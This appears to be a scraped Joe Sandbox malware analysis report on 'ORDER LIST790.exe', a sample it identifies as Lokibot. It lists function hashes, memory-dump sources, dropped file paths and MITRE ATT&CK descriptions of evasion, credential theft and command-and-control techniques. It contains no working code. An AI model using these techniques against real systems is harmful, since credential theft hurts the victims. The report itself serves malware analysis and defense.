Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab9667396a62f5ec7388eac8ad916d32927dae2263cf5ad9d22d4e997f3e3306
Instruction ID: a0dc8957bf959a16582a165e75a34fd297f71c937bc1d219b7bd7179f0e71afa
Opcode Fuzzy Hash: ab9667396a62f5ec7388eac8ad916d32927dae2263cf5ad9d22d4e997f3e3306
Instruction Fuzzy Hash: 8DE0E5353604158FC714DB2ED848D55B7E9EF8AA2131640BAF209CB372DA71EC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05865968 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a92a55cc2e122c7a8b2c790f1bd73a4bffba8a88d5c969195e18ce931a08b9
Instruction ID: 264bc79bc147d6e8de18f37f3a2dface6efa825cac8e9a1d7c46cfa9b102ef5e
Opcode Fuzzy Hash: 08a92a55cc2e122c7a8b2c790f1bd73a4bffba8a88d5c969195e18ce931a08b9
Instruction Fuzzy Hash: 31F03031A006099FCB04AAADC40489EFBB9EFC5210B05869AE9599B221EB70D955C792

Uniqueness

Uniqueness Score: -1.00%

Function 0586FDEE Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b25930ece6e62183a4b16675055b7e1c22e2d909c1864115f905d42c3d400a91
Instruction ID: eece2105e9e07a1c400774c11eeba74e4a66bd1ebcb8c31e4c364bec16e7fb46
Opcode Fuzzy Hash: b25930ece6e62183a4b16675055b7e1c22e2d909c1864115f905d42c3d400a91
Instruction Fuzzy Hash: ECE01A75B000089FCB08CF9DE884DAEB7F5FF8C264B2140AAE609D7321E631ED05CA90

Uniqueness

Uniqueness Score: -1.00%

Function 05864698 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2609981677f76f589287a23c4ef4006f6f7010514a88bedcb55e478e745c0fc5
Instruction ID: 39da7b2799f883d1cfd4b0ff92c101dad44bf0ca9eaf860fce0730e6389cdf7c
Opcode Fuzzy Hash: 2609981677f76f589287a23c4ef4006f6f7010514a88bedcb55e478e745c0fc5
Instruction Fuzzy Hash: 32E0D8312007520FC324E659D8806CBB3EAEFD4224B504E3EE4148B214DBA06C45C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0586E551 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acf7c6a4d7ffbd4372b1aa428eee112c5f99a4c38f58bf568b6d2af12389c274
Instruction ID: 2c3ac72206243b4a1299d4d2fb9842bbf5072421401603a7c1a2ba6086dec8ac
Opcode Fuzzy Hash: acf7c6a4d7ffbd4372b1aa428eee112c5f99a4c38f58bf568b6d2af12389c274
Instruction Fuzzy Hash: 21F0157A90021ACBCF00DF84D4405EDFB75FF54324F158286D900BB200E330AA9ACB80

Uniqueness

Uniqueness Score: -1.00%

Function 0586B6A6 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bd3d1facb90638a51b1e020680fa8858cd670d255f4382adfa8c5342f8a9530
Instruction ID: 734acaca70d1a49e87a552b807511d7952b57866c91d42f0661bbc6381b5f3f7
Opcode Fuzzy Hash: 1bd3d1facb90638a51b1e020680fa8858cd670d255f4382adfa8c5342f8a9530
Instruction Fuzzy Hash: 2CE09A3295021DDACB109B80E148BFCBBB0FB4430BF200022E882F2960C7310A80CE91

Uniqueness

Uniqueness Score: -1.00%

Function 05860F78 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad7f2eabfa18eeb60d41efce110198ab136d9c6308705475a77b97d0d6ed2a0a
Instruction ID: 33dcc76f5f039af6b83d341855d6c656389a8c6199a53ab06c4c7bd429815bf3
Opcode Fuzzy Hash: ad7f2eabfa18eeb60d41efce110198ab136d9c6308705475a77b97d0d6ed2a0a
Instruction Fuzzy Hash: 36E086716107118FD718EB6E9400666B7EBFFC9700B54C56EEC89C7614EB3159014B89

Uniqueness

Uniqueness Score: -1.00%

Function 058669D4 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2735de61279907664ce80a47a5163d9804f772e702dcf6e1331089d55cf87e61
Instruction ID: d6b401e6847af4470a6ecdb780883f2ea7eb009c17dc5a80588bfa1d883c6c20
Opcode Fuzzy Hash: 2735de61279907664ce80a47a5163d9804f772e702dcf6e1331089d55cf87e61
Instruction Fuzzy Hash: E4F0A539A02288CBCF14DBA5E5455ECB7F1EB48216F2004A9DC06B7250DB326E51CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0586A3C1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dab2cb30f1bd964d6f445020c47c719cd068fccf1adb77265a201418b2951f62
Instruction ID: 9d1e0e8d0ee84ae71a9c5043a0964fd9bb1f2a545f6e7739dcb1183f310e049c
Opcode Fuzzy Hash: dab2cb30f1bd964d6f445020c47c719cd068fccf1adb77265a201418b2951f62
Instruction Fuzzy Hash: 93E09278901204EFDF40EFB4E942A9C7BB1FB45219B10426DD808D3391DB359E08DB15

Uniqueness

Uniqueness Score: -1.00%

Function 0586A3D0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5781fa9930ce739eda85b0e915da6625e7d2892a02d2154f06ef55e41682ff
Instruction ID: a38caef09da0b8a7737e85d506237b1e99c070ebffd2d93201b27fdd86847fc7
Opcode Fuzzy Hash: 6e5781fa9930ce739eda85b0e915da6625e7d2892a02d2154f06ef55e41682ff
Instruction Fuzzy Hash: DCE0BF74501208EF9B40EFB4E94289DB7BAEB452147114559E80897311EB356E14DB65

Uniqueness

Uniqueness Score: -1.00%

Function 05863C70 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f16b27c4cd3096e70e83cdb7dbd2aba90dd2547ce3320ee82fef275cb7154b1
Instruction ID: 6ae876308f94940a029e17f5404be586245bf10807a95daaa4c2a534edc2bf02
Opcode Fuzzy Hash: 3f16b27c4cd3096e70e83cdb7dbd2aba90dd2547ce3320ee82fef275cb7154b1
Instruction Fuzzy Hash: 46D01730314A108F8728DB1CE88489AB3EAAF8C2253258969F00AC7760DAA0FC048694

Uniqueness

Uniqueness Score: -1.00%

Function 05863B60 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d99a0a7e8b1072b292a01dfd1cb009899444d8a4fcb40f4c1c61927ecd2dbade
Instruction ID: ec55e4d2c0c683083bc60ad8bef298330820f257c380df531157bd0bb42dadcb
Opcode Fuzzy Hash: d99a0a7e8b1072b292a01dfd1cb009899444d8a4fcb40f4c1c61927ecd2dbade
Instruction Fuzzy Hash: 22E0B635814B0A8EC700EFA8D455A56B7B4FF96310F01969AF8899B532EB70E590EA41

Uniqueness

Uniqueness Score: -1.00%

Function 05861791 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 811bd4156462b266b38f0ce8dca86e975c1f4615a157a4a8fa2b79cb3b32b01d
Instruction ID: e39bc93f273e8ce565418567c34e78efcabdeac3c9495f8bef377d7a8a61c694
Opcode Fuzzy Hash: 811bd4156462b266b38f0ce8dca86e975c1f4615a157a4a8fa2b79cb3b32b01d
Instruction Fuzzy Hash: 40E0177A6011A48FCB558FA8E5099AA7FF1EF49621B05806AEC09DB322CA348901CF84

Uniqueness

Uniqueness Score: -1.00%

Function 058617A0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 443ce194010595f1116f31b26269ca1014fdfbe9519386ffb8999bc486e4b3f6
Instruction ID: 01c25d94472b94a902899ad5cc964c8a68a7c1d2b87964700aa2c2cc9a88fa6e
Opcode Fuzzy Hash: 443ce194010595f1116f31b26269ca1014fdfbe9519386ffb8999bc486e4b3f6
Instruction Fuzzy Hash: 5DD0C93A3101249F8B059B6CE408CAABBE9EB5D6613118066FD09C7321CE71EC109BD4

Uniqueness

Uniqueness Score: -1.00%

Function 05862FDF Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f620d8c37fddcba4f30dbb5c4a425efdc2b226b7e949d950de406701f6554179
Instruction ID: 7eac5225a006ab207d9e3f16102c5e8871e6956ae7bbb4305e6ee818048d7496
Opcode Fuzzy Hash: f620d8c37fddcba4f30dbb5c4a425efdc2b226b7e949d950de406701f6554179
Instruction Fuzzy Hash: 9ED05E200489985ACB31EF69A864BDA2F719F11114F46094AC9D187667CA10999FC6CE

Uniqueness

Uniqueness Score: -1.00%

Function 0586E821 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1953e7fac0aff98ac09227fd175d8a3d41ca6216c8af7d283c68188186d3bc1c
Instruction ID: 922cd520f8a406046f332e03fd2eadf607b901df6d904b55940214e3080e94a0
Opcode Fuzzy Hash: 1953e7fac0aff98ac09227fd175d8a3d41ca6216c8af7d283c68188186d3bc1c
Instruction Fuzzy Hash: 27C08031148B4D5DD71177FD2D0735B774C5F50119F4808595E0DC2541EF14DD204496

Uniqueness

Uniqueness Score: -1.00%

Function 05863B70 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70ff52a53c245135a2a4287e201f27456a5d441361f085e167b80d0125a05f03
Instruction ID: 52729ff38483693af3cba868a9f36c0be2575fb619ec89316544bf307675b199
Opcode Fuzzy Hash: 70ff52a53c245135a2a4287e201f27456a5d441361f085e167b80d0125a05f03
Instruction Fuzzy Hash: DCD09E31414B0DCFC700FF68D444855B7B8FF95310B01869AE5495B232EB70E590DB81

Uniqueness

Uniqueness Score: -1.00%

Function 05860CE1 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276081159.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e11b305421bf2f6e21b1bfbf058e0a6eeff0b265189b140e7a88717f32d145a6
Instruction ID: add794a23ca69a75d58d71e3e7e643421aa9e268eb2b6a3a507f81f2dd7f2569
Opcode Fuzzy Hash: e11b305421bf2f6e21b1bfbf058e0a6eeff0b265189b140e7a88717f32d145a6
Instruction Fuzzy Hash: 5CC09271810302CFEB515FA0E94B36A3BB0FF14701FD49039F82198408EB3D4464BE00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 018EEBB8 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d24aaa2b27d9100c9fe238f4e238702a2bfe01b980749c02cfc8aea840b60c9
Instruction ID: 7881b30849463b94e40afcc56d9083ba838c315564523915cdb8dbc03a123ab1
Opcode Fuzzy Hash: 1d24aaa2b27d9100c9fe238f4e238702a2bfe01b980749c02cfc8aea840b60c9
Instruction Fuzzy Hash: 4D12D5B1411B468FFB12EF65E8C81893BA8F742328FD14308D2616FAD9D7B8156ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 018EC214 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 924bebb985e1f1374fac6d6800ecdb37c4a460ee4a48b9e4140474013daea058
Instruction ID: 92c5a6a09d8189d758d499d05271a763cdfda8806dd913cd9e5a413648cf6cb8
Opcode Fuzzy Hash: 924bebb985e1f1374fac6d6800ecdb37c4a460ee4a48b9e4140474013daea058
Instruction Fuzzy Hash: 72A15332E0061A8FCF05DFB9C8885DDBBF2FF85304B15856AE905EB261DB35AA45CB40

Uniqueness

Uniqueness Score: -1.00%

Function 018EEBA8 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.271859722.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18e0000_ORDER LIST790.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a524560bb3c90593fc8a02c7f74b9e930c93bac7d267153326a946a279dd3c5
Instruction ID: feea04bcd66324ee9eb422d47f65d5b74538f6a26b40b69511f03b27a8dc3aca
Opcode Fuzzy Hash: 5a524560bb3c90593fc8a02c7f74b9e930c93bac7d267153326a946a279dd3c5
Instruction Fuzzy Hash: 1CC13AB18117468FFB11EF24E8C81893BB9FB86328FA14308D1616F6D8D7B8156ACF54

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ORDER LIST790.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER LIST790.exe.log

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
ORDER LIST790.exe

Function 018EBCC2 Relevance: 6.1, APIs: 4, Instructions: 127
threadCOMMON

Function 018EBCD0 Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Function 0586A418 Relevance: 3.8, Strings: 3, Instructions: 88
COMMON

Function 05862409 Relevance: 2.7, Strings: 2, Instructions: 154
COMMON

Function 05862418 Relevance: 2.6, Strings: 2, Instructions: 150
COMMON

Function 058620CC Relevance: 2.6, Strings: 2, Instructions: 89
COMMON

Function 018E99E8 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Function 018E5364 Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Function 018E3EA0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 018EC2F8 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Function 018EC300 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 018E8D50 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON